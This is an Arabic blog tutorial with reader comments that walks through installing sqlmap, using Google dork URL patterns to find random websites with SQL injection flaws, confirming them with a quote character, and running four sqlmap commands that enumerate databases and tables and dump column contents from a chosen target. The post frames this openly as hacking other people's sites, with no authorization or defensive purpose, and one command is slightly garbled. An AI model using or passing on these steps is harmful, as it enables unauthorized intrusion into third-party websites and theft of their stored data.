السلام عليكم في هذا الشرح سوف نقدم لكم طريقة تثبيت أداة sqlmap لإختراق المواقع المصابة بالثغرة sql
للتثبيت أدخل الأوامر التالية
$apt update
$apt upgrade
$apt install git
$git clone https://github.com/sqlmapproject/sqlmap
*والأن ننتظر حتى يتم تثبيت الأداة
-طريقة تشغيل الأداة
لتشغيل الأداة ندخل الأوامر التالية
$cd sqlmap
$ls
$chmod +x sqlmap.py
$python2 sqlmap.py
*والأن مبروك إشتغلت الأداة
-طريقة العمل عليها
والٱن بعد تشغيل الأداة
والٱن نحتاج إلى دوركات أي نهايات
للحصول على مواقع مصابة بالثغرة نذهب إلى المتصفح وندخل إحدى الدوركات التالية
page.php?id=
trainers.php?id=
article.php?ID=
games.php?id=
newsDetail.php?id=
staff.php?id=
products.php?id=
news_view.php?id=
opinions.php?id=
pages.php?id=
ستظهر لنا المواقع المصابة بالثغرة وللتأكد من أنها مصابة بالثغرة نذهب إلى نهاية عنوان الموقع وضع (') هذه النقطة إذا ضهرت لك خطأ أو شيء ٱخر فإن هذا الموقع مصاب بالثغرة
والٱن طريقة إختراقه
نقوم بنسخ الموقع الذي نريد إختراقه
وندخل الأوامر التالية
الأمر الأول
python2 sqlmap.py -u name web --dbs s-- level=3 --risk=3 --batch
الأمر الثاني
python2 sqlmap.py -u name web -D (name_database) --tables --level=3 --risk=3 --batch
الأمر الثالث
python2 sqlmap.py -u name web -D (NAME_database) -T (name_table) --columns --level=3 --risk=3 --batch
الأمر الرابع والأخير
python2 sqlmap.py -u name web -D (NAME_database) -T (NAME_table) -C (NAME_column) --dump --level=3 --risk=3 --batch
ملاحظة هامة مكان name web نضع رابط الموقع الذي نريد إختراقه
ومكان (name_database) عنوان الذي سيضهر لنا بعد إدخال الأمر الأول
وشكرااا😘😘😘😘😘
لمن يواجه مشكلة فاليترك تعليق سيتم الرد بسرعة
شكرا لك
ردحذفشكرا لك
ردحذفوالله انا عاوز اتعلمها بس مش عارف
ردحذفأزال المؤلف هذا التعليق.
ردحذفأزال المؤلف هذا التعليق.
ردحذفما تضبط معي ماعرف وش الموضوع
ردحذف